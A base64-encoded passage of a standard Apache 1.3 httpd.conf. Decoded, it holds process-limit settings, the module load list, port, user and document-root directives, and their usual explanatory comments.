ZW5vdWdoIHNlcnZlciBwcm9jZXNzZXMgdG8KIyBoYW5kbGUgdGhlIGN1cnJlbnQgbG9hZCwgcGx1 cyBhIGZldyBzcGFyZSBzZXJ2ZXJzIHRvIGhhbmRsZSB0cmFuc2llbnQKIyBsb2FkIHNwaWtlcyAo ZS5nLiwgbXVsdGlwbGUgc2ltdWx0YW5lb3VzIHJlcXVlc3RzIGZyb20gYSBzaW5nbGUKIyBOZXRz Y2FwZSBicm93c2VyKS4KIwojIEl0IGRvZXMgdGhpcyBieSBwZXJpb2RpY2FsbHkgY2hlY2tpbmcg aG93IG1hbnkgc2VydmVycyBhcmUgd2FpdGluZwojIGZvciBhIHJlcXVlc3QuICBJZiB0aGVyZSBh cmUgZmV3ZXIgdGhhbiBNaW5TcGFyZVNlcnZlcnMsIGl0IGNyZWF0ZXMKIyBhIG5ldyBzcGFyZS4g IElmIHRoZXJlIGFyZSBtb3JlIHRoYW4gTWF4U3BhcmVTZXJ2ZXJzLCBzb21lIG9mIHRoZQojIHNw YXJlcyBkaWUgb2ZmLiAgVGhlIGRlZmF1bHQgdmFsdWVzIGFyZSBwcm9iYWJseSBPSyBmb3IgbW9z dCBzaXRlcy4KIwpNaW5TcGFyZVNlcnZlcnMgNQpNYXhTcGFyZVNlcnZlcnMgMjAKCiMKIyBOdW1i ZXIgb2Ygc2VydmVycyB0byBzdGFydCBpbml0aWFsbHkgLS0tIHNob3VsZCBiZSBhIHJlYXNvbmFi bGUgYmFsbHBhcmsKIyBmaWd1cmUuCiMKU3RhcnRTZXJ2ZXJzIDgKCiMKIyBMaW1pdCBvbiB0b3Rh bCBudW1iZXIgb2Ygc2VydmVycyBydW5uaW5nLCBpLmUuLCBsaW1pdCBvbiB0aGUgbnVtYmVyCiMg b2YgY2xpZW50cyB3aG8gY2FuIHNpbXVsdGFuZW91c2x5IGNvbm5lY3QgLS0tIGlmIHRoaXMgbGlt aXQgaXMgZXZlcgojIHJlYWNoZWQsIGNsaWVudHMgd2lsbCBiZSBMT0NLRUQgT1VULCBzbyBpdCBz aG91bGQgTk9UIEJFIFNFVCBUT08gTE9XLgojIEl0IGlzIGludGVuZGVkIG1haW5seSBhcyBhIGJy YWtlIHRvIGtlZXAgYSBydW5hd2F5IHNlcnZlciBmcm9tIHRha2luZwojIHRoZSBzeXN0ZW0gd2l0 aCBpdCBhcyBpdCBzcGlyYWxzIGRvd24uLi4KIwpNYXhDbGllbnRzIDE1MAoKIwojIE1heFJlcXVl c3RzUGVyQ2hpbGQ6IHRoZSBudW1iZXIgb2YgcmVxdWVzdHMgZWFjaCBjaGlsZCBwcm9jZXNzIGlz CiMgYWxsb3dlZCB0byBwcm9jZXNzIGJlZm9yZSB0aGUgY2hpbGQgZGllcy4gIFRoZSBjaGlsZCB3 aWxsIGV4aXQgc28KIyBhcyB0byBhdm9pZCBwcm9ibGVtcyBhZnRlciBwcm9sb25nZWQgdXNlIHdo ZW4gQXBhY2hlIChhbmQgbWF5YmUgdGhlCiMgbGlicmFyaWVzIGl0IHVzZXMpIGxlYWsgbWVtb3J5 IG9yIG90aGVyIHJlc291cmNlcy4gIE9uIG1vc3Qgc3lzdGVtcywgdGhpcwojIGlzbid0IHJlYWxs eSBuZWVkZWQsIGJ1dCBhIGZldyAoc3VjaCBhcyBTb2xhcmlzKSBkbyBoYXZlIG5vdGFibGUgbGVh a3MKIyBpbiB0aGUgbGlicmFyaWVzLiBGb3IgdGhlc2UgcGxhdGZvcm1zLCBzZXQgdG8gc29tZXRo aW5nIGxpa2UgMTAwMDAKIyBvciBzbzsgYSBzZXR0aW5nIG9mIDAgbWVhbnMgdW5saW1pdGVkLgoj CiMgTk9URTogVGhpcyB2YWx1ZSBkb2VzIG5vdCBpbmNsdWRlIGtlZXBhbGl2ZSByZXF1ZXN0cyBh ZnRlciB0aGUgaW5pdGlhbAojICAgICAgIHJlcXVlc3QgcGVyIGNvbm5lY3Rpb24uIEZvciBleGFt cGxlLCBpZiBhIGNoaWxkIHByb2Nlc3MgaGFuZGxlcwojICAgICAgIGFuIGluaXRpYWwgcmVxdWVz dCBhbmQgMTAgc3Vic2VxdWVudCAia2VwdGFsaXZlIiByZXF1ZXN0cywgaXQKIyAgICAgICB3b3Vs ZCBvbmx5IGNvdW50IGFzIDEgcmVxdWVzdCB0b3dhcmRzIHRoaXMgbGltaXQuCiMKTWF4UmVxdWVz dHNQZXJDaGlsZCAxMDAwCgojCiMgTGlzdGVuOiBBbGxvd3MgeW91IHRvIGJpbmQgQXBhY2hlIHRv IHNwZWNpZmljIElQIGFkZHJlc3NlcyBhbmQvb3IKIyBwb3J0cywgaW4gYWRkaXRpb24gdG8gdGhl IGRlZmF1bHQuIFNlZSBhbHNvIHRoZSA8VmlydHVhbEhvc3Q+CiMgZGlyZWN0aXZlLgojCiNMaXN0 ZW4gMzAwMAojTGlzdGVuIDEyLjM0LjU2Ljc4OjgwCiNMaXN0ZW4gODAKCiMKIyBCaW5kQWRkcmVz czogWW91IGNhbiBzdXBwb3J0IHZpcnR1YWwgaG9zdHMgd2l0aCB0aGlzIG9wdGlvbi4gVGhpcyBk aXJlY3RpdmUKIyBpcyB1c2VkIHRvIHRlbGwgdGhlIHNlcnZlciB3aGljaCBJUCBhZGRyZXNzIHRv IGxpc3RlbiB0by4gSXQgY2FuIGVpdGhlcgojIGNvbnRhaW4gIioiLCBhbiBJUCBhZGRyZXNzLCBv ciBhIGZ1bGx5IHF1YWxpZmllZCBJbnRlcm5ldCBkb21haW4gbmFtZS4KIyBTZWUgYWxzbyB0aGUg PFZpcnR1YWxIb3N0PiBhbmQgTGlzdGVuIGRpcmVjdGl2ZXMuCiMKI0JpbmRBZGRyZXNzICoKCiMK IyBEeW5hbWljIFNoYXJlZCBPYmplY3QgKERTTykgU3VwcG9ydAojCiMgVG8gYmUgYWJsZSB0byB1 c2UgdGhlIGZ1bmN0aW9uYWxpdHkgb2YgYSBtb2R1bGUgd2hpY2ggd2FzIGJ1aWx0IGFzIGEgRFNP IHlvdQojIGhhdmUgdG8gcGxhY2UgY29ycmVzcG9uZGluZyBgTG9hZE1vZHVsZScgbGluZXMgYXQg dGhpcyBsb2NhdGlvbiBzbyB0aGUKIyBkaXJlY3RpdmVzIGNvbnRhaW5lZCBpbiBpdCBhcmUgYWN0 dWFsbHkgYXZhaWxhYmxlIF9iZWZvcmVfIHRoZXkgYXJlIHVzZWQuCiMgUGxlYXNlIHJlYWQgdGhl IGZpbGUgUkVBRE1FLkRTTyBpbiB0aGUgQXBhY2hlIDEuMyBkaXN0cmlidXRpb24gZm9yIG1vcmUK IyBkZXRhaWxzIGFib3V0IHRoZSBEU08gbWVjaGFuaXNtIGFuZCBydW4gYGh0dHBkIC1sJyBmb3Ig dGhlIGxpc3Qgb2YgYWxyZWFkeQojIGJ1aWx0LWluIChzdGF0aWNhbGx5IGxpbmtlZCBhbmQgdGh1 cyBhbHdheXMgYXZhaWxhYmxlKSBtb2R1bGVzIGluIHlvdXIgaHR0cGQKIyBiaW5hcnkuCiMKIyBO b3RlOiBUaGUgb3JkZXIgaW4gd2hpY2ggbW9kdWxlcyBhcmUgbG9hZGVkIGlzIGltcG9ydGFudC4g IERvbid0IGNoYW5nZQojIHRoZSBvcmRlciBiZWxvdyB3aXRob3V0IGV4cGVydCBhZHZpY2UuCiMK IyBFeGFtcGxlOgojIExvYWRNb2R1bGUgZm9vX21vZHVsZSBtb2R1bGVzL21vZF9mb28uc28KCiNM b2FkTW9kdWxlIG1tYXBfc3RhdGljX21vZHVsZSBtb2R1bGVzL21vZF9tbWFwX3N0YXRpYy5zbwpM b2FkTW9kdWxlIHZob3N0X2FsaWFzX21vZHVsZSBtb2R1bGVzL21vZF92aG9zdF9hbGlhcy5zbwo8 SWZEZWZpbmUgSEFWRV9CQU5EV0lEVEg+CkxvYWRNb2R1bGUgYmFuZHdpZHRoX21vZHVsZSAgIG1v ZHVsZXMvbW9kX2JhbmR3aWR0aC5zbwo8L0lmRGVmaW5lPgo8SWZEZWZpbmUgSEFWRV9USFJPVFRM RT4KTG9hZE1vZHVsZSB0aHJvdHRsZV9tb2R1bGUgICAgbW9kdWxlcy9tb2RfdGhyb3R0bGUuc28K PC9JZkRlZmluZT4KTG9hZE1vZHVsZSBlbnZfbW9kdWxlICAgICAgICAgbW9kdWxlcy9tb2RfZW52 LnNvCkxvYWRNb2R1bGUgY29uZmlnX2xvZ19tb2R1bGUgIG1vZHVsZXMvbW9kX2xvZ19jb25maWcu c28KTG9hZE1vZHVsZSBhZ2VudF9sb2dfbW9kdWxlICAgbW9kdWxlcy9tb2RfbG9nX2FnZW50LnNv CkxvYWRNb2R1bGUgcmVmZXJlcl9sb2dfbW9kdWxlIG1vZHVsZXMvbW9kX2xvZ19yZWZlcmVyLnNv CiNMb2FkTW9kdWxlIG1pbWVfbWFnaWNfbW9kdWxlICBtb2R1bGVzL21vZF9taW1lX21hZ2ljLnNv CkxvYWRNb2R1bGUgbWltZV9tb2R1bGUgICAgICAgIG1vZHVsZXMvbW9kX21pbWUuc28KTG9hZE1v ZHVsZSBuZWdvdGlhdGlvbl9tb2R1bGUgbW9kdWxlcy9tb2RfbmVnb3RpYXRpb24uc28KTG9hZE1v ZHVsZSBzdGF0dXNfbW9kdWxlICAgICAgbW9kdWxlcy9tb2Rfc3RhdHVzLnNvCkxvYWRNb2R1bGUg aW5mb19tb2R1bGUgICAgICAgIG1vZHVsZXMvbW9kX2luZm8uc28KTG9hZE1vZHVsZSBpbmNsdWRl c19tb2R1bGUgICAgbW9kdWxlcy9tb2RfaW5jbHVkZS5zbwpMb2FkTW9kdWxlIGF1dG9pbmRleF9t b2R1bGUgICBtb2R1bGVzL21vZF9hdXRvaW5kZXguc28KTG9hZE1vZHVsZSBkaXJfbW9kdWxlICAg ICAgICAgbW9kdWxlcy9tb2RfZGlyLnNvCkxvYWRNb2R1bGUgY2dpX21vZHVsZSAgICAgICAgIG1v ZHVsZXMvbW9kX2NnaS5zbwpMb2FkTW9kdWxlIGFzaXNfbW9kdWxlICAgICAgICBtb2R1bGVzL21v ZF9hc2lzLnNvCkxvYWRNb2R1bGUgaW1hcF9tb2R1bGUgICAgICAgIG1vZHVsZXMvbW9kX2ltYXAu c28KTG9hZE1vZHVsZSBhY3Rpb25fbW9kdWxlICAgICAgbW9kdWxlcy9tb2RfYWN0aW9ucy5zbwoj TG9hZE1vZHVsZSBzcGVsaW5nX21vZHVsZSAgICAgbW9kdWxlcy9tb2Rfc3BlbGluZy5zbwpMb2Fk TW9kdWxlIHVzZXJkaXJfbW9kdWxlICAgICBtb2R1bGVzL21vZF91c2VyZGlyLnNvCkxvYWRNb2R1 bGUgYWxpYXNfbW9kdWxlICAgICAgIG1vZHVsZXMvbW9kX2FsaWFzLnNvCkxvYWRNb2R1bGUgcmV3 cml0ZV9tb2R1bGUgICAgIG1vZHVsZXMvbW9kX3Jld3JpdGUuc28KTG9hZE1vZHVsZSBhY2Nlc3Nf bW9kdWxlICAgICAgbW9kdWxlcy9tb2RfYWNjZXNzLnNvCkxvYWRNb2R1bGUgYXV0aF9tb2R1bGUg ICAgICAgIG1vZHVsZXMvbW9kX2F1dGguc28KTG9hZE1vZHVsZSBhbm9uX2F1dGhfbW9kdWxlICAg bW9kdWxlcy9tb2RfYXV0aF9hbm9uLnNvCkxvYWRNb2R1bGUgZGJfYXV0aF9tb2R1bGUgICAgIG1v ZHVsZXMvbW9kX2F1dGhfZGIuc28KI0xvYWRNb2R1bGUgYXV0aF9hbnlfbW9kdWxlICAgIG1vZHVs ZXMvbW9kX2F1dGhfYW55LnNvCiNMb2FkTW9kdWxlIGRibV9hdXRoX21vZHVsZSAgICBtb2R1bGVz L21vZF9hdXRoX2RibS5zbwojTG9hZE1vZHVsZSBhdXRoX2xkYXBfbW9kdWxlICAgbW9kdWxlcy9t b2RfYXV0aF9sZGFwLnNvCiNMb2FkTW9kdWxlIG15c3FsX2F1dGhfbW9kdWxlICBtb2R1bGVzL21v ZF9hdXRoX215c3FsLnNvCiNMb2FkTW9kdWxlIGF1dGhfcGdzcWxfbW9kdWxlICBtb2R1bGVzL21v ZF9hdXRoX3Bnc3FsLnNvCiNMb2FkTW9kdWxlIGRpZ2VzdF9tb2R1bGUgICAgICBtb2R1bGVzL21v ZF9kaWdlc3Quc28KI0xvYWRNb2R1bGUgcHJveHlfbW9kdWxlICAgICAgIG1vZHVsZXMvbGlicHJv eHkuc28KI0xvYWRNb2R1bGUgY2Vybl9tZXRhX21vZHVsZSAgIG1vZHVsZXMvbW9kX2Nlcm5fbWV0 YS5zbwpMb2FkTW9kdWxlIGV4cGlyZXNfbW9kdWxlICAgICBtb2R1bGVzL21vZF9leHBpcmVzLnNv CkxvYWRNb2R1bGUgaGVhZGVyc19tb2R1bGUgICAgIG1vZHVsZXMvbW9kX2hlYWRlcnMuc28KI0xv YWRNb2R1bGUgdXNlcnRyYWNrX21vZHVsZSAgIG1vZHVsZXMvbW9kX3VzZXJ0cmFjay5zbwojTG9h ZE1vZHVsZSBleGFtcGxlX21vZHVsZSAgICAgbW9kdWxlcy9tb2RfZXhhbXBsZS5zbwojTG9hZE1v ZHVsZSB1bmlxdWVfaWRfbW9kdWxlICAgbW9kdWxlcy9tb2RfdW5pcXVlX2lkLnNvCkxvYWRNb2R1 bGUgc2V0ZW52aWZfbW9kdWxlICAgIG1vZHVsZXMvbW9kX3NldGVudmlmLnNvCjxJZkRlZmluZSBI QVZFX1BFUkw+CkxvYWRNb2R1bGUgcGVybF9tb2R1bGUgICAgICAgIG1vZHVsZXMvbGlicGVybC5z bwo8L0lmRGVmaW5lPgo8SWZEZWZpbmUgSEFWRV9QSFA+CkxvYWRNb2R1bGUgcGhwX21vZHVsZSAg ICAgICAgIG1vZHVsZXMvbW9kX3BocC5zbwo8L0lmRGVmaW5lPgo8SWZEZWZpbmUgSEFWRV9QSFAz PgpMb2FkTW9kdWxlIHBocDNfbW9kdWxlICAgICAgICBtb2R1bGVzL2xpYnBocDMuc28KPC9JZkRl ZmluZT4KPElmRGVmaW5lIEhBVkVfUEhQND4KTG9hZE1vZHVsZSBwaHA0X21vZHVsZSAgICAgICAg bW9kdWxlcy9saWJwaHA0LnNvCjwvSWZEZWZpbmU+CjxJZkRlZmluZSBIQVZFX0RBVj4KTG9hZE1v ZHVsZSBkYXZfbW9kdWxlICAgICAgICAgbW9kdWxlcy9saWJkYXYuc28KPC9JZkRlZmluZT4KPElm RGVmaW5lIEhBVkVfUk9BTUlORz4KTG9hZE1vZHVsZSByb2FtaW5nX21vZHVsZSAgICAgbW9kdWxl cy9tb2Rfcm9hbWluZy5zbwo8L0lmRGVmaW5lPgo8SWZEZWZpbmUgSEFWRV9TU0w+CkxvYWRNb2R1 bGUgc3NsX21vZHVsZSAgICAgICAgIG1vZHVsZXMvbGlic3NsLnNvCjwvSWZEZWZpbmU+CjxJZkRl ZmluZSBIQVZFX1BVVD4KTG9hZE1vZHVsZSBwdXRfbW9kdWxlICAgICAgICAgbW9kdWxlcy9tb2Rf cHV0LnNvCjwvSWZEZWZpbmU+CjxJZkRlZmluZSBIQVZFX1BZVEhPTj4KTG9hZE1vZHVsZSBweXRo b25fbW9kdWxlICAgICAgbW9kdWxlcy9tb2RfcHl0aG9uLnNvCjwvSWZEZWZpbmU+CgojIExvYWRN b2R1bGUgbHhwX21vZHVsZSAgICAgICAgIGxpYi9hcGFjaGUvbGlibHhwLnNvCkxvYWRNb2R1bGUg bHhwX21vZHVsZQkJL3Vzci9saWIvYXBhY2hlL2xpYmx4cC5zbwoKIyAgUmVjb25zdHJ1Y3Rpb24g b2YgdGhlIGNvbXBsZXRlIG1vZHVsZSBsaXN0IGZyb20gYWxsIGF2YWlsYWJsZSBtb2R1bGVzCiMg IChzdGF0aWMgYW5kIHNoYXJlZCBvbmVzKSB0byBhY2hpZXZlIGNvcnJlY3QgbW9kdWxlIGV4ZWN1 dGlvbiBvcmRlci4KIyAgW1dIRU5FVkVSIFlPVSBDSEFOR0UgVEhFIExPQURNT0RVTEUgU0VDVElP TiBBQk9WRSBVUERBVEUgVEhJUywgVE9PXQpDbGVhck1vZHVsZUxpc3QKI0FkZE1vZHVsZSBtb2Rf bW1hcF9zdGF0aWMuYwpBZGRNb2R1bGUgbW9kX3Zob3N0X2FsaWFzLmMKPElmRGVmaW5lIEhBVkVf QkFORFdJRFRIPgpBZGRNb2R1bGUgbW9kX2JhbmR3aWR0aC5jCjwvSWZEZWZpbmU+CjxJZkRlZmlu ZSBIQVZFX1RIUk9UVExFPgpBZGRNb2R1bGUgbW9kX3Rocm90dGxlLmMKPC9JZkRlZmluZT4KQWRk TW9kdWxlIG1vZF9lbnYuYwpBZGRNb2R1bGUgbW9kX2xvZ19jb25maWcuYwpBZGRNb2R1bGUgbW9k X2xvZ19hZ2VudC5jCkFkZE1vZHVsZSBtb2RfbG9nX3JlZmVyZXIuYwojQWRkTW9kdWxlIG1vZF9t aW1lX21hZ2ljLmMKQWRkTW9kdWxlIG1vZF9taW1lLmMKQWRkTW9kdWxlIG1vZF9uZWdvdGlhdGlv bi5jCkFkZE1vZHVsZSBtb2Rfc3RhdHVzLmMKQWRkTW9kdWxlIG1vZF9pbmZvLmMKQWRkTW9kdWxl IG1vZF9pbmNsdWRlLmMKQWRkTW9kdWxlIG1vZF9hdXRvaW5kZXguYwpBZGRNb2R1bGUgbW9kX2Rp ci5jCkFkZE1vZHVsZSBtb2RfY2dpLmMKQWRkTW9kdWxlIG1vZF9hc2lzLmMKQWRkTW9kdWxlIG1v ZF9pbWFwLmMKQWRkTW9kdWxlIG1vZF9hY3Rpb25zLmMKI0FkZE1vZHVsZSBtb2Rfc3BlbGluZy5j CkFkZE1vZHVsZSBtb2RfdXNlcmRpci5jCkFkZE1vZHVsZSBtb2RfYWxpYXMuYwpBZGRNb2R1bGUg bW9kX3Jld3JpdGUuYwpBZGRNb2R1bGUgbW9kX2FjY2Vzcy5jCkFkZE1vZHVsZSBtb2RfYXV0aC5j CkFkZE1vZHVsZSBtb2RfYXV0aF9hbm9uLmMKQWRkTW9kdWxlIG1vZF9hdXRoX2RiLmMKI0FkZE1v ZHVsZSBtb2RfYXV0aF9hbnkuYwojQWRkTW9kdWxlIG1vZF9hdXRoX2RibS5jCiNBZGRNb2R1bGUg YXV0aF9sZGFwLmMKI0FkZE1vZHVsZSBtb2RfYXV0aF9teXNxbC5jCiNBZGRNb2R1bGUgbW9kX2F1 dGhfcGdzcWwuYwojQWRkTW9kdWxlIG1vZF9kaWdlc3QuYwojQWRkTW9kdWxlIG1vZF9wcm94eS5j CiNBZGRNb2R1bGUgbW9kX2Nlcm5fbWV0YS5jCkFkZE1vZHVsZSBtb2RfZXhwaXJlcy5jCkFkZE1v ZHVsZSBtb2RfaGVhZGVycy5jCiNBZGRNb2R1bGUgbW9kX3VzZXJ0cmFjay5jCiNBZGRNb2R1bGUg bW9kX2V4YW1wbGUuYwojQWRkTW9kdWxlIG1vZF91bmlxdWVfaWQuYwpBZGRNb2R1bGUgbW9kX3Nv LmMKQWRkTW9kdWxlIG1vZF9zZXRlbnZpZi5jCjxJZkRlZmluZSBIQVZFX1BFUkw+CkFkZE1vZHVs ZSBtb2RfcGVybC5jCjwvSWZEZWZpbmU+CjxJZkRlZmluZSBIQVZFX1BIUD4KQWRkTW9kdWxlIG1v ZF9waHAuYwo8L0lmRGVmaW5lPgo8SWZEZWZpbmUgSEFWRV9QSFAzPgpBZGRNb2R1bGUgbW9kX3Bo cDMuYwo8L0lmRGVmaW5lPgo8SWZEZWZpbmUgSEFWRV9QSFA0PgpBZGRNb2R1bGUgbW9kX3BocDQu Ywo8L0lmRGVmaW5lPgo8SWZEZWZpbmUgSEFWRV9EQVY+CkFkZE1vZHVsZSBtb2RfZGF2LmMKPC9J ZkRlZmluZT4KPElmRGVmaW5lIEhBVkVfUk9BTUlORz4KQWRkTW9kdWxlIG1vZF9yb2FtaW5nLmMK PC9JZkRlZmluZT4KPElmRGVmaW5lIEhBVkVfU1NMPgpBZGRNb2R1bGUgbW9kX3NzbC5jCjwvSWZE ZWZpbmU+CjxJZkRlZmluZSBIQVZFX1BVVD4KQWRkTW9kdWxlIG1vZF9wdXQuYwo8L0lmRGVmaW5l Pgo8SWZEZWZpbmUgSEFWRV9QWVRIT04+CkFkZE1vZHVsZSBtb2RfcHl0aG9uLmMKPC9JZkRlZmlu ZT4KCkFkZE1vZHVsZSBtb2RfbHhwLmMKCiMKIyBFeHRlbmRlZFN0YXR1cyBjb250cm9scyB3aGV0 aGVyIEFwYWNoZSB3aWxsIGdlbmVyYXRlICJmdWxsIiBzdGF0dXMKIyBpbmZvcm1hdGlvbiAoRXh0 ZW5kZWRTdGF0dXMgT24pIG9yIGp1c3QgYmFzaWMgaW5mb3JtYXRpb24gKEV4dGVuZGVkU3RhdHVz CiMgT2ZmKSB3aGVuIHRoZSAic2VydmVyLXN0YXR1cyIgaGFuZGxlciBpcyBjYWxsZWQuIFRoZSBk ZWZhdWx0IGlzIE9mZi4KIwojRXh0ZW5kZWRTdGF0dXMgT24KCiMjIyBTZWN0aW9uIDI6ICdNYWlu JyBzZXJ2ZXIgY29uZmlndXJhdGlvbgojCiMgVGhlIGRpcmVjdGl2ZXMgaW4gdGhpcyBzZWN0aW9u IHNldCB1cCB0aGUgdmFsdWVzIHVzZWQgYnkgdGhlICdtYWluJwojIHNlcnZlciwgd2hpY2ggcmVz cG9uZHMgdG8gYW55IHJlcXVlc3RzIHRoYXQgYXJlbid0IGhhbmRsZWQgYnkgYQojIDxWaXJ0dWFs SG9zdD4gZGVmaW5pdGlvbi4gIFRoZXNlIHZhbHVlcyBhbHNvIHByb3ZpZGUgZGVmYXVsdHMgZm9y CiMgYW55IDxWaXJ0dWFsSG9zdD4gY29udGFpbmVycyB5b3UgbWF5IGRlZmluZSBsYXRlciBpbiB0 aGUgZmlsZS4KIwojIEFsbCBvZiB0aGVzZSBkaXJlY3RpdmVzIG1heSBhcHBlYXIgaW5zaWRlIDxW aXJ0dWFsSG9zdD4gY29udGFpbmVycywKIyBpbiB3aGljaCBjYXNlIHRoZXNlIGRlZmF1bHQgc2V0 dGluZ3Mgd2lsbCBiZSBvdmVycmlkZGVuIGZvciB0aGUKIyB2aXJ0dWFsIGhvc3QgYmVpbmcgZGVm aW5lZC4KIwoKIwojIElmIHlvdXIgU2VydmVyVHlwZSBkaXJlY3RpdmUgKHNldCBlYXJsaWVyIGlu IHRoZSAnR2xvYmFsIEVudmlyb25tZW50JwojIHNlY3Rpb24pIGlzIHNldCB0byAiaW5ldGQiLCB0 aGUgbmV4dCBmZXcgZGlyZWN0aXZlcyBkb24ndCBoYXZlIGFueQojIGVmZmVjdCBzaW5jZSB0aGVp ciBzZXR0aW5ncyBhcmUgZGVmaW5lZCBieSB0aGUgaW5ldGQgY29uZmlndXJhdGlvbi4KIyBTa2lw IGFoZWFkIHRvIHRoZSBTZXJ2ZXJBZG1pbiBkaXJlY3RpdmUuCiMKCiMKIyBQb3J0OiBUaGUgcG9y dCB0byB3aGljaCB0aGUgc3RhbmRhbG9uZSBzZXJ2ZXIgbGlzdGVucy4gRm9yCiMgcG9ydHMgPCAx MDIzLCB5b3Ugd2lsbCBuZWVkIGh0dHBkIHRvIGJlIHJ1biBhcyByb290IGluaXRpYWxseS4KIwpQ b3J0IDgwCgojIwojIyAgU1NMIFN1cHBvcnQKIyMKIyMgIFdoZW4gd2UgYWxzbyBwcm92aWRlIFNT TCB3ZSBoYXZlIHRvIGxpc3RlbiB0byB0aGUgCiMjICBzdGFuZGFyZCBIVFRQIHBvcnQgKHNlZSBh Ym92ZSkgYW5kIHRvIHRoZSBIVFRQUyBwb3J0CiMjCjxJZkRlZmluZSBIQVZFX1NTTD4KTGlzdGVu IDgwCkxpc3RlbiA0NDMKPC9JZkRlZmluZT4KCiMKIyBJZiB5b3Ugd2lzaCBodHRwZCB0byBydW4g YXMgYSBkaWZmZXJlbnQgdXNlciBvciBncm91cCwgeW91IG11c3QgcnVuCiMgaHR0cGQgYXMgcm9v dCBpbml0aWFsbHkgYW5kIGl0IHdpbGwgc3dpdGNoLiAgCiMKIyBVc2VyL0dyb3VwOiBUaGUgbmFt ZSAob3IgI251bWJlcikgb2YgdGhlIHVzZXIvZ3JvdXAgdG8gcnVuIGh0dHBkIGFzLgojICAuIE9u IFNDTyAoT0RUIDMpIHVzZSAiVXNlciBub3VzZXIiIGFuZCAiR3JvdXAgbm9ncm91cCIuCiMgIC4g T24gSFBVWCB5b3UgbWF5IG5vdCBiZSBhYmxlIHRvIHVzZSBzaGFyZWQgbWVtb3J5IGFzIG5vYm9k eSwgYW5kIHRoZQojICAgIHN1Z2dlc3RlZCB3b3JrYXJvdW5kIGlzIHRvIGNyZWF0ZSBhIHVzZXIg d3d3IGFuZCB1c2UgdGhhdCB1c2VyLgojICBOT1RFIHRoYXQgc29tZSBrZXJuZWxzIHJlZnVzZSB0 byBzZXRnaWQoR3JvdXApIG9yIHNlbWN0bChJUENfU0VUKQojICB3aGVuIHRoZSB2YWx1ZSBvZiAo dW5zaWduZWQpR3JvdXAgaXMgYWJvdmUgNjAwMDA7IAojICBkb24ndCB1c2UgR3JvdXAgbm9ib2R5 IG9uIHRoZXNlIHN5c3RlbXMhCiMKVXNlciBhcGFjaGUKR3JvdXAgYXBhY2hlCgojCiMgU2VydmVy QWRtaW46IFlvdXIgYWRkcmVzcywgd2hlcmUgcHJvYmxlbXMgd2l0aCB0aGUgc2VydmVyIHNob3Vs ZCBiZQojIGUtbWFpbGVkLiAgVGhpcyBhZGRyZXNzIGFwcGVhcnMgb24gc29tZSBzZXJ2ZXItZ2Vu ZXJhdGVkIHBhZ2VzLCBzdWNoCiMgYXMgZXJyb3IgZG9jdW1lbnRzLgojClNlcnZlckFkbWluIHJv b3RAbG9jYWxob3N0CgojCiMgU2VydmVyTmFtZSBhbGxvd3MgeW91IHRvIHNldCBhIGhvc3QgbmFt ZSB3aGljaCBpcyBzZW50IGJhY2sgdG8gY2xpZW50cyBmb3IKIyB5b3VyIHNlcnZlciBpZiBpdCdz IGRpZmZlcmVudCB0aGFuIHRoZSBvbmUgdGhlIHByb2dyYW0gd291bGQgZ2V0IChpLmUuLCB1c2UK IyAid3d3IiBpbnN0ZWFkIG9mIHRoZSBob3N0J3MgcmVhbCBuYW1lKS4KIwojIE5vdGU6IFlvdSBj YW5ub3QganVzdCBpbnZlbnQgaG9zdCBuYW1lcyBhbmQgaG9wZSB0aGV5IHdvcmsuIFRoZSBuYW1l IHlvdSAKIyBkZWZpbmUgaGVyZSBtdXN0IGJlIGEgdmFsaWQgRE5TIG5hbWUgZm9yIHlvdXIgaG9z dC4gSWYgeW91IGRvbid0IHVuZGVyc3RhbmQKIyB0aGlzLCBhc2sgeW91ciBuZXR3b3JrIGFkbWlu aXN0cmF0b3IuCiMgSWYgeW91ciBob3N0IGRvZXNuJ3QgaGF2ZSBhIHJlZ2lzdGVyZWQgRE5TIG5h bWUsIGVudGVyIGl0cyBJUCBhZGRyZXNzIGhlcmUuCiMgWW91IHdpbGwgaGF2ZSB0byBhY2Nlc3Mg aXQgYnkgaXRzIGFkZHJlc3MgKGUuZy4sIGh0dHA6Ly8xMjMuNDUuNjcuODkvKQojIGFueXdheSwg YW5kIHRoaXMgd2lsbCBtYWtlIHJlZGlyZWN0aW9ucyB3b3JrIGluIGEgc2Vuc2libGUgd2F5Lgoj CiMgMTI3LjAuMC4xIGlzIHRoZSBUQ1AvSVAgbG9jYWwgbG9vcC1iYWNrIGFkZHJlc3MsIG9mdGVu IG5hbWVkIGxvY2FsaG9zdC4gWW91ciAKIyBtYWNoaW5lIGFsd2F5cyBrbm93cyBpdHNlbGYgYnkg dGhpcyBhZGRyZXNzLiBJZiB5b3UgdXNlIEFwYWNoZSBzdHJpY3RseSBmb3IgCiMgbG9jYWwgdGVz dGluZyBhbmQgZGV2ZWxvcG1lbnQsIHlvdSBtYXkgdXNlIDEyNy4wLjAuMSBhcyB0aGUgc2VydmVy IG5hbWUuCiMKI1NlcnZlck5hbWUgbG9jYWxob3N0CgojCiMgRG9jdW1lbnRSb290OiBUaGUgZGly ZWN0b3J5IG91dCBvZiB3aGljaCB5b3Ugd2lsbCBzZXJ2ZSB5b3VyCiMgZG9jdW1lbnRzLiBCeSBk ZWZhdWx0LCBhbGwgcmVxdWVzdHMgYXJlIHRha2VuIGZyb20gdGhpcyBkaXJlY3RvcnksIGJ1dAoj IHN5bWJvbGljIGxpbmtzIGFuZCBhbGlhc2VzIG1heSBiZSB1c2VkIHRvIHBvaW50IHRvIG90aGVy IGxvY2F0aW9ucy4KIwpEb2N1bWVudFJvb3QgIi92YXIvd3d3L2h0bWwiCgojCiMgRWFjaCBkaXJl Y3RvcnkgdG8gd2hpY2ggQXBhY2hlIGhhcyBhY2Nlc3MsIGNhbiBiZSBjb25maWd1cmVkIHdpdGgg cmVzcGVjdAojIHRvIHdoaWNoIHNlcnZpY2VzIGFuZCBmZWF0dXJlcyBhcmUgYWxsb3dlZCBhbmQv b3IgZGlzYWJsZWQgaW4gdGhhdAojIGRpcmVjdG9yeSAoYW5kIGl0cyBzdWJkaXJlY3Rvcmllcyku IAojCiMgRmlyc3QsIHdlIGNvbmZpZ3VyZSB0aGUgImRlZmF1bHQiIHRvIGJlIGEgdmVyeSByZXN0 cmljdGl2ZSBzZXQgb2YgCiMgcGVybWlzc2lvbnMuICAKIwo8RGlyZWN0b3J5IC8+CiAgICBPcHRp b25zIEZvbGxvd1N5bUxpbmtzCiAgICBBbGxvd092ZXJyaWRlIE5vbmUKPC9EaXJlY3Rvcnk+Cgoj 